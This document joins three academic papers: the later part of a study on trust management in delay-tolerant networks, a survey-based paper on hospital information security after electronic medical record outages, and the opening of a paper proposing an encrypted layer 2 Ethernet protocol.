Nodes make trust decisions in [2] based on the directly connected nodes. Only the nodes that send each segment to the destination, or to an intermediate node with enough segments to recreate M, receive trust modifications. Fig. 2a shows an example of this. Assume that the source is node 1, the destination is node 10, and the number of segments required to recreate a message M is k = 3. Each of the three required segments takes a different path, namely {1, 2, 3, 4, 10}, {1, 5, 6, 10} and {1, 5, 7, 8, 9, 10}. In this case, node 10 only increases the trust level for nodes 4, 6 and 9 even though six other nodes were along the paths that the segments traveled.

Each node along a path appends its ID to each segment as it flows through the network. Assuming nodes act truthfully, the destination will have the path for each segment. Using Fig. 1, upon transitioning to state S3, trust is distributed along the paths used to recreate the message. Let us denote the trust change to be calculated as z. Fig. 2b shows an example of this distribution. Each directly connected node receives an increase of z, and that value is divided by 2^h, where h is the number of hops back from the destination along a given path. If a node directly connected to the destination lies along npath multiple paths, such as node 9, then its trust increase is z × npath. In the example, node 3 receives z/2 and node 5 receives 3z/8 because it is along two paths, one at hop 3 and the other at hop 4 from the destination.

Additionally, negative trust can be distributed back along a path. Assume node 10 is in state S3 for message M and is waiting for additional segments to make trust decisions. A segment of message M arrives using the red path in Fig. 2b. Negative trust can be distributed back along the path {1, 2, 3, 4, 10}. Other than the source, node 1, receiving z/8, all other values will be the same.


(a) Path Trust Distribution in [2] (b) Updated Trust Distribution

Fig. 2. Trust Distribution Changes

B. Trust Updates Using Segment Matching (SegMatch)

Fig. 1 shows all the states that a node goes through for each message M. When a node is in state S1 or S2 and m ∈ nM, signifying that the node has seen m before, SegMatch is called. This is done to compare the paths that the two identical segments took to arrive at a particular node.

In Fig. 3, node 1 is the source and node 7 is the destination that received m along multiple paths. The paths segment m followed are {1, 2, 5} and {1, 3, 4}. Assume that at any given time there is a set of "trusted" nodes consisting of all nodes above a certain threshold; designate this as set A. In Fig. 3 all of the green nodes are above that threshold, so A = {1, 2, 4, 6}. The set of all nodes along the paths m took is B = {1, 2, 3, 4, 5}. The set of suspect nodes is C = B − A = {3, 5}.
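The set bookkeeping in this example is simple enough to state directly in code; the function name is illustrative, and the numeric trust values here are invented to reproduce the figure's sets.

```python
def suspect_nodes(paths, trust, threshold):
    """SegMatch bookkeeping sketch (names follow the text): B is every node
    on the paths the duplicate segment took, A is the currently "trusted"
    set above the threshold, and the suspects are C = B - A."""
    B = set().union(*paths)
    A = {n for n, t in trust.items() if t >= threshold}
    return B - A

# Fig. 3 example: A = {1, 2, 4, 6}, B = {1, 2, 3, 4, 5}, so C = {3, 5}
trust = {1: .9, 2: .8, 3: .3, 4: .7, 5: .2, 6: .9, 7: .4}
print(sorted(suspect_nodes([{1, 2, 5}, {1, 3, 4}], trust, 0.5)))  # [3, 5]
```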

When two segments m for message M arrive at node i with the same ID along different paths, their payloads either match or do not. If they do not match, then some small trust deduction is merited; if they are the same, then a small increase is merited. Equation 1 is the trust reduction function for nodes in set C. Because a node's trust can fluctuate, we consider all nodes suspect and assume C = B.

Node i reduces trust for each j ∈ C; the new trust NT_{i,j} is the current trust CT_{i,j} minus a small penalty that consists of three parts. The first part, (1 − CT_{i,j}), links the penalty to node i's current trust level for node j: a more trustworthy node receives a smaller penalty. The second part, z/a, where a is the number of elements in C, divides the penalty z by the number of possible culprits; the more culprits, the more ambiguity, and so the smaller the penalty. The final part, (1 + (1 − pnx)^{|B|}), again takes the number of nodes into account: the term (1 − pnx)^{|B|} reflects the probability that a certain number of nodes are all bad, accounting for both the size of the network and the current trust average for the network, pnx.

NT_{i,j} = CT_{i,j} − (1 − CT_{i,j}) × (z/a) × (1 + (1 − pnx)^{|B|})    (1)

Equation 2 shows the trust increase when the message segments along both paths are the same. Equation 2 is the result of solving Equation 1 for CT_{i,j} and then substituting NT_{i,j} for CT_{i,j} and vice versa. As a result, one good event and one bad event occurring in sequence, with no other changes, leave the trust value of a node the same as it was prior to both events.

NT_{i,j} = ( CT_{i,j} + (z/a) × (1 + (1 − pnx)^{|B|}) ) / ( 1 + (z/a) × (1 + (1 − pnx)^{|B|}) )    (2)

C. Simulation Results for Direct Trust

A number of simulations were conducted utilizing NS3 with the DTN module proposed by Lakkakorpi et al. in [7] and the node trust management object DtnTrust proposed in [2]. Modifications to the DtnTrust object include tracking the path of each message segment, distributing trust along paths, and making incremental updates when message segments have the same ID but arrived along different paths.

The simulations run in [2] are rerun here with the modifications listed above. A total of 40 nodes are randomly placed on a 2500 m × 2500 m grid and move according to a random waypoint (RWP) mobility model. Each node sends message segments of various sizes using erasure coding. The average of ten 1000-second simulation runs is used. The same random seeds are used for both sets of results.

Figs. 4 and 5 show the power of full path knowledge. Fig. 4 shows results with the fraction of nodes that act truthfully set to 90%, and Fig. 5 shows results with this fraction set to 60%. Subfigures (b) show the results with full path knowledge, while subfigures (a) show results without it. There is a pronounced difference

Fig. 3. SegMatch Example


(a) 90% Path Trustworthiness as per [2] (b) 90% Path Trustworthiness with Modification

Fig. 4. Ranking of All Nodes According to Their Trustworthiness pnx = 0.9

(a) 60% Path Trustworthiness as per [2] (b) 60% Path Trustworthiness with Modification

Fig. 5. Ranking of All Nodes According to Their Trustworthiness pnx = 0.6

between the trust values for good and bad nodes in Fig. 4b vs. 4a. Higher pollution by bad nodes makes the results less clear as the fraction of good nodes decreases. In future research, we plan to exclude recognized bad nodes from routing, which would help to prevent this effect. We will also investigate stronger trust increases for nodes behaving correctly.

III. INFERRED TRUST

Nodes can infer trust based on interactions. Fig. 6 shows nodes i and j. Assuming that they are within broadcast range and have sufficient time to transmit, they first trade their trust information about other nodes in the network. This is used to update the trust levels for both nodes. In this example, node i sends its trust vector (shaded green) to node j and receives node j's trust vector in return. Node i maintains an (n + 1) × n inferred trust matrix that consists of trust vectors received from other nodes with an appended time stamp; the trust vector received from node j is shaded red. Each entry in node i's inferred trust matrix is a value between 0.0 and 1.0. A node will state that it trusts itself at level 1.0, so the diagonal is all 1's. The column for i in the inferred trust matrix (in yellow) is the inferred trust vector. In addition there are two (n + 1) × 1 vectors. The direct trust vector (in blue) is updated by direct trust observations made by node i, with a time stamp. The aggregate trust vector (in green) is the combination of the inferred and direct trust vectors. Any trust decision made by node i is based on the trust values in the aggregate trust vector (green).

The inferred trust vector is maintained through two processes. The first is a periodic update based on the inferred trust matrix: after a certain time period or number of encounters, the vector is updated (see Section III-A). The second process occurs each time a node receives the trust vector from another node in the network (see Section III-B).

A. Periodic Updates to Inferred Trust Vector

Equation 3 finds the difference between what node i has stored in its trust vector and what node j broadcasts as its trust vector. The difference is determined for each node w ∈ N, where N is the set of all nodes in the network. This value is multiplied by the square of node i's trust of node j, giving more weight to trusted nodes.

C^i_w = (T^i_j)^2 × (T^i_w − T^j_w)    (3)

Fig. 6. Storage at node i

The difference is not immediately used to update node i's trust vector, but is maintained for a time interval ∆t in the inferred trust matrix. Once the time interval is complete, the differences received from D, the set of nodes from which node i received trust vectors, are averaged, and node i updates its inferred trust vector using the following equation.

T^i_w = T^i_w + β × ( Σ_{f=1}^{|D|} C^f_w ) / |D|    (4)
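Equations 3 and 4 might be sketched as below. This is an illustrative reading, not the authors' code; the sign convention follows the equations as printed, and the sample trust vectors are invented.

```python
def discrepancy(Ti, Tj, j):
    """Eq. 3 sketch: C^i_w = (T^i_j)**2 * (T^i_w - T^j_w), i.e. the
    disagreement about each node w, weighted by the square of node i's
    trust in the sender j."""
    return {w: (Ti[j] ** 2) * (Ti[w] - Tj[w]) for w in Tj if w != j}

def periodic_update(Ti, stored, beta):
    """Eq. 4 sketch: after the interval delta-t, shift each T^i_w by beta
    times the average of the stored discrepancies C^f_w over the |D|
    senders heard from during the interval."""
    for w in Ti:
        cs = [C[w] for C in stored if w in C]
        if cs:
            Ti[w] = Ti[w] + beta * sum(cs) / len(cs)
    return Ti

Ti = {1: 0.8, 2: 0.5, 3: 0.6}
Tj = {1: 0.9, 2: 0.7, 3: 0.6}          # vector broadcast by node j = 1
stored = [discrepancy(Ti, Tj, j=1)]    # one sender, so |D| = 1
print(round(periodic_update(Ti, stored, beta=0.5)[2], 3))  # 0.436
```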

B. Direct Updates to Inferred Trust Vector

Node i updates trust based on any discrepancy between its aggregate trust vector and the trust vector sent by node j. There are two cases when node i receives the trust vector from node j. Case 1 is that all values in node i's inferred trust vector are within τ of all values in the trust vector from node j (|T^i_w − T^j_w| < τ for all w ∈ N). Case 2 occurs if one or more of such values are not within τ. Case 1 results in a small increase of trust for node j in node i's inferred trust matrix. For case 2, trust is decreased for all w where |T^i_w − T^j_w| ≥ τ. Equation 5 defines the change in trust for node j and Equation 6 prescribes the change in trust for all other nodes that are outside τ.

T^i_j = T^i_j × ( 1 − (α × d) / (2 × (|N| − 2)) )    (5)

T^i_w = T^i_w × ( 1 − α / (2 × d) )    (6)

For the updated set of equations, there are four tunableparameters, α, β, ∆t and τ .

1) α - This is the penalty weight in Equations 5 and 6. The variable d is the number of discrepancies. If d = 0, then no nodes get a penalty and the equations are not used.

2) β - This is the weight given to the indirect observationand it is a value between 0.0 and 1.0.

3) ∆t - This is the time period the node waits between trust updates.

4) τ - This is the risk taken; it represents the acceptable difference between node i's and node j's declared trust for node w before node i makes trust changes.
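Putting the two cases and the parameters together, the direct update might look like the sketch below. This is one reading of Equations 5 and 6 (the function name and sample values are invented), and the case-1 reward, whose formula is not given in the text, is left unspecified.

```python
def direct_update(Ti, Tj, j, alpha, tau):
    """Sketch of the case-2 update on receiving node j's trust vector:
    d counts the nodes w whose reported trust differs from node i's by at
    least tau; the sender j is penalized in proportion to d (Eq. 5), and
    each disagreeing w is penalized by alpha / (2d) (Eq. 6)."""
    N = len(Ti)
    disagree = [w for w in Tj if w != j and abs(Ti[w] - Tj[w]) >= tau]
    d = len(disagree)
    if d == 0:
        return Ti                              # case 1: small reward for j
    Ti[j] *= 1 - (alpha * d) / (2 * (N - 2))   # Eq. 5
    for w in disagree:
        Ti[w] *= 1 - alpha / (2 * d)           # Eq. 6
    return Ti

Ti = {1: 0.8, 2: 0.6, 3: 0.9, 4: 0.5}
Tj = {1: 0.8, 2: 0.1, 3: 0.9, 4: 0.5}   # node j = 1 disagrees about node 2
direct_update(Ti, Tj, j=1, alpha=0.2, tau=0.3)
print(Ti[2] < 0.6 and Ti[1] < 0.8)  # True: both sender and suspect penalized
```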

C. Simulation Results for Indirect Trust

In order to test some of the tunable parameters, a simulation engine is proposed that acts as a discrete event simulator [8]. A complete graph is created using the number of nodes n in a given network. Each edge weight is a random number uniformly distributed over [0.0, 1.0) and represents the intermeeting time between the nodes connected by this edge. If the edge weight is 1.0, the nodes are in constant contact; if it is 0.0, they never meet. This simulates an arbitrary mobility pattern in the network.

Internal events are those that are node driven, and external events are those driven by the interaction between nodes. The former are based primarily on node attributes and the latter on edge weights. The only internal event used for this set of simulations is a node trust update associated with the ∆t value. If node i's timer, set to ∆t, expires, it triggers a node trust update event using Equation 4.

The external events are the node meeting events. They are derived from the intermeeting time between nodes. The time of the next meeting is based on a Poisson distribution (assumed here, as in other publications, to be the distribution of intermeeting times between nodes) using the following equation.

mTime_{i,j} += −(1 / w_{i,j}) × ln(u),  u ∼ U(0, 1)    (7)

Here mTime_{i,j} is the current meeting time between node i and node j, initialized prior to each run using the right-hand side of Equation 7. The value w_{i,j} is the inverse of the intermeeting time, which is also the weight given to each edge in the complete graph.
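Equation 7 is the standard inverse-transform sampling of exponential inter-arrival gaps, which makes the meeting events on each edge a Poisson process. A minimal sketch (the function name and the rate value are illustrative):

```python
import math
import random

def next_meeting(m_time, w_ij, rng):
    """Eq. 7 sketch: advance the meeting clock for edge (i, j) by an
    exponentially distributed gap with rate w_ij (the edge weight),
    yielding Poisson-distributed meeting events along each edge."""
    u = rng.random()           # uniform draw from [0, 1)
    while u == 0.0:            # guard against log(0)
        u = rng.random()
    return m_time + (-1.0 / w_ij) * math.log(u)

rng = random.Random(7)
t = 0.0
times = []
for _ in range(5):
    t = next_meeting(t, w_ij=0.5, rng=rng)
    times.append(t)
print(times == sorted(times) and times[0] > 0)  # True: the clock only advances
```

Since −ln(u) is strictly positive for u in (0, 1), each sampled gap moves the meeting clock forward, matching the simulator's event ordering.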

Each simulation consists of 1000 runs for each network size 3 ≤ n ≤ 50 and returns the average time to converge and the number of node updates that occur. Each node also maintains the last time it updated its trust, initialized uniformly over the interval [0.0, ∆t); its inferred trust vector, initialized with values uniformly distributed over [0.0, 1.0); and its inferred trust matrix, initialized with all zeros. For each run of the simulation, each event is taken in order and follows the rules above depending on the event type. The run ends when either


(a) Time to Converge, cf = 0.05 (b) Number of Updates, cf = 0.05

Fig. 7. Effect of ∆t

10,000 time units expire or all nodes have converged to the same trust values, plus or minus a convergence factor, cf, from the average.

Fig. 7 shows several key points that justify further research. The first is that the system converges rather quickly; Fig. 7a shows the exact times with cf = 0.05 for multiple values of ∆t. The second is that after the network size reaches n ≈ 20, the convergence time levels off for all ∆t. The third is that the shorter the ∆t, the faster the network converges, as intuitively expected. The fourth is that the number of updates increases linearly as n increases for all ∆t, as seen in Fig. 7b.

IV. FUTURE WORKS AND CONCLUSIONS

The results above show the improvement arising from the use of full path knowledge. Assessing the potential for further improvements from using inferred trust is one of the goals of future research. Additional improvements include integration of the direct and inferred clues, exploration of additional direct clues and confirmation of inferred clues, threat model expansion, and comparisons with other proposed trust management schemes [3]–[5].

The use of complete paths as a clue advances the results in [2]. Research into additional clues and the best methods to identify potential cheaters, as well as the effect on node resources, should better identify limitations. Indirect or inferred clues add overhead that must be considered.

The fundamental issue for trust management is to converge to a state in which the bad nodes can be identified. In this paper, the assumed threat model was that a bad node would not try to hide, so the longer the scheme runs, the more differences between bad and good nodes arise. With sophisticated adversaries, which switch between bad and good behavior, it will be important that a good period does not erase all sins from the past. We believe that our use of the current trust in assigning penalties and rewards is a good way to address this issue, but the right weights need to be established experimentally. This will be an important direction of our future work.

ACKNOWLEDGMENT

This work was supported in part by the Army Research Laboratory under Cooperative Agreement Numbers W911NF-06-3-0001 and W911NF-09-2-0053. The views and conclusions contained in this paper are those of the authors and should not be interpreted as representing the official policies, either expressed or implied, of the Army Research Laboratory or the U.S. Government.

REFERENCES

[1] J.-H. Cho, A. Swami, and I.-R. Chen, "A survey on trust management for mobile ad hoc networks," IEEE Communications Surveys & Tutorials, vol. 13, no. 4, pp. 562–583, 2011.

[2] T. A. Babbitt and B. K. Szymanski, "Trust management in delay tolerant networks utilizing erasure coding," in IEEE ICC 2015 – Ad-hoc and Sensor Networking Symposium (ICC'15 AHSN), London, United Kingdom, Jun. 2015.

[3] M. K. Denko, T. Sun, and I. Woungang, "Trust management in ubiquitous computing: A Bayesian approach," Computer Communications, vol. 34, no. 3, pp. 398–406, Mar. 2011.

[4] E. Ayday and F. Fekri, "An iterative algorithm for trust management and adversary detection for delay-tolerant networks," IEEE Transactions on Mobile Computing, vol. 11, no. 9, pp. 1514–1531, Sept. 2012.

[5] I.-R. Chen, F. Bao, M. Chang, and J.-H. Cho, "Dynamic trust management for delay tolerant networks and its application to secure routing," IEEE Transactions on Parallel and Distributed Systems, vol. 25, no. 5, pp. 1200–1210, May 2014.

[6] Y. Wang, S. Jain, M. Martonosi, and K. Fall, "Erasure-coding based routing for opportunistic networks," in Proceedings of the 2005 ACM SIGCOMM Workshop on Delay-Tolerant Networking (WDTN '05), New York, NY, USA: ACM, 2005, pp. 229–236.

[7] J. Lakkakorpi and P. Ginzboorg, "ns-3 module for routing and congestion control studies in mobile opportunistic DTNs," in 2013 International Symposium on Performance Evaluation of Computer and Telecommunication Systems (SPECTS), July 2013, pp. 46–50.

[8] K. Wehrle, M. Gunes, and J. Gross, Modeling and Tools for Network Simulation. Springer Science & Business Media, 2010.


Investigating Information Security Effectiveness after an Extreme Event

Victoria Kisekka

University at Buffalo

Buffalo, NY, USA

Abstract—This research in progress investigates the antecedents of effective Information Security (IS) in an organization following an extreme event. The motivation for this research is the prevalence of information security incidents, which pose increasing risks to business continuity, especially in the aftermath of an extreme event when organizations may lack sufficient resources to effectively safeguard their networks. A sample of 207 survey responses was gathered from 10 organizations. The results show that Incident Command Leadership (ICL) and employee empowerment have a positive influence on IS effectiveness. The relationship between organizational resilience and IS effectiveness was not supported. These preliminary findings have implications for information security and business continuity theories. The findings also have implications for practice.

Keywords—information security effectiveness; health information security; extreme events; emergency preparedness

I. INTRODUCTION

The increasing number of information security incidents has raised concerns regarding the safety of information and network resources in general. Security practitioners further anticipate more sophisticated security attacks in the future. Moreover, the vulnerability of information resources to security-related incidents is exacerbated in the aftermath of an extreme event, when an organization may be operating under stress due to limited resources and uncertainty. Naturally, following an extreme event, organizations focus on continuing business operations. In a hospital, the priority is patient care, and as such, information security procedures may be ignored or unknowingly implemented incorrectly. One way to minimize the potential occurrence of security breaches after an extreme event is to improve the effectiveness of IS solutions after such an event. Maintaining a high level of security after an event is very important to both patients and hospitals. For patients, a security breach could lead to identity theft. Hospitals, on the other hand, may experience financial loss, reduced employee productivity, and considerable damage to their reputation.

The objective of this research-in-progress paper is to investigate the antecedents of IS effectiveness after an extreme event. IS effectiveness relates to the extent to which information is protected from adversarial behavior. The term extreme event is used in this research to refer to an incident that disrupts normal operations in an organization. The extreme event studied is Electronic Medical Record (EMR) system

outages. The motivation for this research is that risks associated with information security are greatly increased after an extreme event. The increased risk is due to uncertainty, which increases the likelihood of human error. Previous studies have also documented several security attacks that have occurred, or are likely to occur, during emergency response [1]. Failure to protect information can have severe consequences affecting patients' health, and even hospitals in terms of profit and loss of competitive advantage.

In this research, the effects of ICL, employee empowerment, and the organization's level of resilience on IS effectiveness after an extreme event are investigated using a survey instrument. The rest of the paper is organized as follows: the next section presents the hypotheses, followed by the methodology; in the last section the results are discussed.

II. THEORETICAL DEVELOPMENT

The theoretical foundation for this study is the Information Security effectiveness model [2]. The model examines organizational-level constructs that enhance the effectiveness of IS. The causal relationships investigated in prior literature include organizational size, management support, and type of services rendered [2]. I extend this model to the extreme events area by investigating three key variables, namely, ICL, employee empowerment, and organizational resilience. Each of these variables is discussed in detail in the next paragraphs.

Incident Command Leadership (ICL): ICL is defined in this research as a unified command structure or a single individual responsible for managing all activities related to the extreme event. Establishing leadership during the extreme event improves collaborative efforts by ensuring that there is a single chain of command and reduces the likelihood of effort duplication. Effective leadership skills are essential for properly managing an extreme event [3]. In the information systems literature, effective management has been linked to increased engagement in more IS practices [2]. These findings suggest that incident command leaders may be able to encourage individuals to engage in information security behavior and to ensure that personal information is well protected after the extreme event. For these reasons, I hypothesize the following:

H1: Incident Command Leadership will have a positive influence on information security effectiveness after an extreme event.

Employee empowerment: Employee empowerment pertains to an individual’s “perception of control, competence, and goal


internalization" [4]. Empowered employees have a high capacity for independent decision-making and generally take the initiative to act or perform productively. The marketing literature provides support for the positive relationship between empowerment and several aspects of performance, such as increased responsiveness to failures [5, 6] and productivity [7]. This suggests that when individuals are empowered to independently take on tasks, to improvise in the absence of necessary resources, and to use previously acquired skills, they are more likely to also be prepared to take appropriate actions to safeguard protected information after an extreme event. From this, I hypothesize the following:

H2: Employee empowerment will have a positive influence on information security effectiveness after an extreme event.

Organizational resilience: Resilience pertains to the organization’s ability to maintain service continuity following an extreme event. This ability is determined by how quickly the organization is able to ‘bounce back’ to normal operations [8]. At the organizational level, resilience also promotes organizational performance [9]. Resilience, therefore, represents an organization’s inherent capacity to withstand disturbances and to maintain operations. A resilient organization is more likely to maintain the functionality of its operations, including the protection of sensitive information, compared to a non-resilient organization. This leads us to hypothesize the following:

H3: Organizational resilience will have a positive influence on information security effectiveness after an extreme event.

The proposed research model is shown in Fig. 1.

Fig 1. Theoretical model investigating the causal relationships of IS effectiveness after an extreme event.

III. METHODOLOGY

Data were collected using a survey instrument. The dependent variable in this study, IS effectiveness, was measured using four items, adapted and modified from previous studies [10, 11]. The items were: information protection against internal threats, information protection against external threats, access control, and secure information sharing. ICL was measured using five items: two of the items, namely, the leader’s ability to anticipate workflow problems

and avoid crises, and empowering individual situational decision awareness, were adapted from Kayworth and Leidner [12]. The rest of the items were self-created, namely: the presence of a leader to manage activities related to the extreme event, the leader's ability to inspire confidence, and the employees' level of trust in the leader's effectiveness. Employee empowerment was measured using three items adapted from Menon [4]: employees' capabilities, competence, and work efficiency after the extreme event. Lastly, organizational resilience was measured using three items related to bouncing back, adapted from Smith et al. [13]. All items were anchored on a seven-point scale ranging from 'strongly disagree' (1) to 'strongly agree' (7). All questions in the survey were referent-shifted from the individual to the organizational level. All measures were reflective.

A. Sample

The survey was administered to hospital staff in 10 different hospitals in the Western New York region. Out of the 590 individuals surveyed, 207 completed surveys were returned.

B. Data Analyses

The psychometric properties of the measurement scales were tested using SPSS. The results in Table I show that convergent validity and discriminant validity were met based on the recommended guidelines [14]. The sample was tested for sampling adequacy using maximum likelihood extraction with varimax rotation. The Kaiser–Meyer–Olkin (KMO) measure of sampling adequacy was .906, which is considered excellent [15]. The variance between the variables was also tested using Bartlett's test of sphericity. The test was statistically significant, indicating the existence of relationships in the data (χ² = 3456.979, df = 105, p < .001).

TABLE I. ITEM FACTOR LOADINGS

Item    Sec     ICL     Emp     Res
Sec1    .823    .260    .245    .211
Sec2    .794    .169    .183    .205
Sec3    .688    .40     .271    .256
Sec4    .666    .244    .242    .335
ICL1    .287    .875    .182    .164
ICL2    .288    .853    .149    .187
ICL3    .142    .818    .179    .242
ICL4    .211    .808    .251    .267
ICL5    .184    .816    .148    .196
Emp1    .229    .193    .926    .202
Emp2    .268    .229    .834    .131
Emp3    .207    .228    .733    .339
Res1    .291    .301    .242    .844
Res2    .299    .257    .255    .840
Res3    .275    .308    .205    .829

Sec = Information Security Effectiveness; ICL = Incident Command Leadership; Emp = Employee Empowerment; Res = Organizational Resilience.

The data were also tested for multicollinearity. The observed Tolerance values were above 0.1 and the Variance Inflation Factors (VIFs) were below 10, as recommended in the literature [16].
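For the two-predictor case, the screen just described reduces to a simple formula: VIF = 1 / (1 − r²), with r the Pearson correlation between the predictors, and tolerance is its reciprocal. The sketch below illustrates this on synthetic data; the study's own diagnostics were computed in SPSS, and the function names and sample sizes here are invented.

```python
import math
import random

def pearson_r(x, y):
    # sample Pearson correlation between two equal-length lists
    n = len(x)
    mx, my = sum(x) / n, sum(y) / n
    sxy = sum((a - mx) * (b - my) for a, b in zip(x, y))
    sxx = sum((a - mx) ** 2 for a in x)
    syy = sum((b - my) ** 2 for b in y)
    return sxy / math.sqrt(sxx * syy)

def vif_pair(x, y):
    """Two-predictor variance inflation factor: VIF = 1 / (1 - r^2);
    tolerance is 1 / VIF. Illustrative of the multicollinearity screen."""
    r = pearson_r(x, y)
    return 1.0 / (1.0 - r * r)

random.seed(1)
x = [random.gauss(0, 1) for _ in range(500)]
y = [0.3 * a + random.gauss(0, 1) for a in x]   # mildly collinear predictors
v = vif_pair(x, y)
print(v < 10 and 1.0 / v > 0.1)  # True: passes the VIF < 10, tolerance > 0.1 rule
```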

The hypothesized research model was subsequently tested using Partial Least Squares regression. The research model was supported at p < .01, R² = 70.8%, adjusted R² = 70.4%. The


supported relationships include ICL (t = 3.033, p = .003) and employee empowerment (t = 2.255, p = .025), which were positively associated with IS effectiveness. The relationship between organizational resilience and IS effectiveness was not supported (t = 1.158, p = .247).

IV. DISCUSSION AND CONCLUSION

The results supported the hypothesized positive relationship between ICL and IS effectiveness after an extreme event. This finding confirms earlier studies that found a link between leadership and effective emergency management [3]. The predicted model also supported the positive relationship between employee empowerment and IS effectiveness. This means that when employees are empowered, they engage in behavior or activities that promote the organization's ability to recover from a failure. The results did not support the link between organizational resilience and IS effectiveness. These results have several implications. While unplanned incidents are often characterized by chaos, stress, and uncertainty, effective leadership through encouragement of information security behavior is crucial to IS effectiveness. Organizations should take the necessary steps to create effective leaders whose ability to manage unplanned incidents would ensure optimal security of protected information. Organizations also need to create incident response policies and procedures that provide detailed guidelines for establishing incident command structures for managing the incident. With regard to employee empowerment, the results provide evidence that even after an extreme event, empowered individuals are able to independently take the necessary actions to mitigate any effects of the incident that may adversely impact IS effectiveness. It is suggested, therefore, that organizations invest in their employees by providing them with access to resources that teach self-empowerment.

This study is still a work in progress. There are other relationships that are still being investigated.

ACKNOWLEDGMENT

This research was funded by the National Science Foundation Graduate Research Fellowship under Grant 1241709. The usual disclaimer applies.

REFERENCES

[1] Loukas, G., D. Gan, and T. Vuong. A taxonomy of cyber attack and defence mechanisms for emergency management networks. In Proceedings of the Third International Workshop on Pervasive Networks for Emergency Management (IEEE PerNem 2013), San Diego, CA, USA, 2013.

[2] Kankanhalli, A., et al., An integrative study of information systems security effectiveness. International Journal of Information Management, 2003. 23(2): p. 139-154.

[3] Waugh, W.L. and G. Streib, Collaboration and leadership for effective emergency management. Public Administration Review, 2006. 66(s1): p. 131-140.

[4] Menon, S., Employee empowerment: An integrative psychological approach. Applied Psychology, 2001. 50(1): p. 153-180.

[5] Hocutt, M.A. and T.H. Stone, The impact of employee empowerment on the quality of a service recovery effort. Journal of Quality Management, 1998. 3(1): p. 117-132.

[6] Miller, J.L., C.W. Craighead, and K.R. Karwan, Service recovery: a framework and empirical investigation. Journal of Operations Management, 2000. 18(4): p. 387-400.

[7] Savery, L.K. and J.A. Luks, The relationship between empowerment, job satisfaction and reported stress levels: some Australian evidence. Leadership & Organization Development Journal, 2001. 22(3): p. 97-104.

[8] Tugade, M.M. and B.L. Fredrickson, Resilient individuals use positive emotions to bounce back from negative emotional experiences. Journal of Personality and Social Psychology, 2004. 86(2): p. 320.

[9] Vidal, R., H. Carvalho, and V.A. Cruz-Machado. Strategic Resilience Development: A Study Using Delphi. in Proceedings of the Eighth International Conference on Management Science and Engineering Management. 2014. Springer.

[10] Lee, Y.W., et al., AIMQ: a methodology for information quality assessment. Information & Management, 2002. 40(2): p. 133-146.

[11] Kim, D.J., N. Sivasailam, and H.R. Rao, Information assurance in B2C websites for information goods/services. Electronic Markets, 2004. 14(4): p. 344-359.

[12] Kayworth, T.R. and D.E. Leidner, Leadership effectiveness in global virtual teams. Journal of Management Information Systems, 2002. 18(3): p. 7-40.

[13] Smith, B.W., et al., The brief resilience scale: assessing the ability to bounce back. International Journal of Behavioral Medicine, 2008. 15(3): p. 194-200.

[14] Backhaus, J., et al., Test–retest reliability and validity of the Pittsburgh Sleep Quality Index in primary insomnia. Journal of Psychosomatic Research, 2002. 53(3): p. 737-740.

[15] Hutcheson, G.D. and N. Sofroniou, The multivariate social scientist: Introductory statistics using generalized linear models. 1999: Sage.

[16] O’Brien, R.M., A caution regarding rules of thumb for variance inflation factors. Quality & Quantity, 2007. 41(5): p. 673-690.


A Layer 2 Protocol to Protect the IP Communication in a Wired Ethernet Network

Reiner Campillo
Technical Manager – RADEI Project
Ministry of Higher Education, Science and Technology (MESCYT)
Santo Domingo, Dominican Republic
Email: [email protected]

Tae (Tom) Oh
Dept. of Information Sciences and Technologies
Rochester Institute of Technology
Rochester, NY 14623
Email: [email protected]

Abstract—Data encapsulated using the IP protocol can be compromised if it is sent in clear text or without integrity protection. Even when known protocols are used to protect the confidentiality, integrity and authenticity of this data, the EtherType field of the Ethernet frames and the header of the IP packets in a wired Ethernet network still remain exposed, opening possibilities for an attacker to gain knowledge of the network, cause a denial of service or steal information. This paper proposes a new protocol that protects the confidentiality, integrity and authenticity of the IP communication in a wired Ethernet network. The new protocol operates at layer 2 of the OSI model. For each Ethernet frame, it encapsulates the EtherType field and the entire IP packet into a new PDU structure that is partially encrypted. Integrity and authenticity are assured by an HMAC value or a digital signature calculated over the entire frame. Several tests were performed to analyze the security characteristics and performance impact of our proposed solution. The results of these tests demonstrate that all traffic is effectively protected and that an attacker would not learn the type of protocols, the IP addresses or any other data travelling across the network. It is also demonstrated that, under certain conditions, performance is not highly impacted and it is feasible to protect the network communication with our new protocol.

Keywords—layer 2 protocol; wired ethernet network; security; pdu; ip communication.

I. INTRODUCTION

The IP protocol is one of the key elements that make communication possible in today’s data networks; its main purpose is to provide an addressing mechanism for the delivery of data between two hosts regardless of their physical location [5]. Data communicated using this protocol is encapsulated into IP packets [6] that, in their basic structure, are sent over the network in clear text, allowing any eavesdropper to read the entire content of what has been transmitted. Moreover, IP communication was designed without taking into consideration any need for confidentiality [8], and by default, all data transmission between two hosts can be compromised.

Known protocols such as TLS, SSH and IPSec have been developed to protect the confidentiality and integrity of the information transmitted over IP [7], but they fail to offer this protection to the header of the IP packets, leaving it exposed in clear text and opening possibilities for an attacker to gain knowledge of the network, disrupt the communication or steal information. In the case of wireless Ethernet networks, this problem has been thoroughly addressed, and protocols such as WPA and WPA2 were developed to protect the confidentiality and integrity of the entire IP packets, including the IP header and the transmitted data [1]; however, the problem is still present in wired Ethernet networks. In order to protect the entire IP communication in these networks, it is necessary to increase security at layer 2 of the OSI model by offering confidentiality protection for the EtherType field of the Ethernet frame and the encapsulated IP packet, and integrity protection for the entire Ethernet frame.

Some solutions have been proposed to address the lack of confidentiality and/or integrity of the data transmitted over wired Ethernet networks. The PPP Encryption Control Protocol, for example, defines a standard method to encrypt the information in a PPP link, but it does not specify any method to protect the integrity or authenticity of the transmitted data, providing only confidentiality protection [9]. The IEEE also proposed a solution with the standard IEEE 802.1AE, called MACsec [2], which provides confidentiality, integrity and authenticity protection at layer 2; however, its implementation can represent a large investment in new hardware, limiting the scenarios where it can be deployed. Another solution was proposed by Yves Igor Jerschow, Christian Lochert, Björn Scheuermann and Martin Mauve [4] with a protocol called Cryptographic Link Layer (CLL), which provides authentication, integrity, confidentiality and replay attack protection to IP packets in the link layer; however, this protocol strongly relies on digital certificates to authenticate hosts. In addition, encryption of data is optional and does not cover ARP, broadcast or DHCP packets.

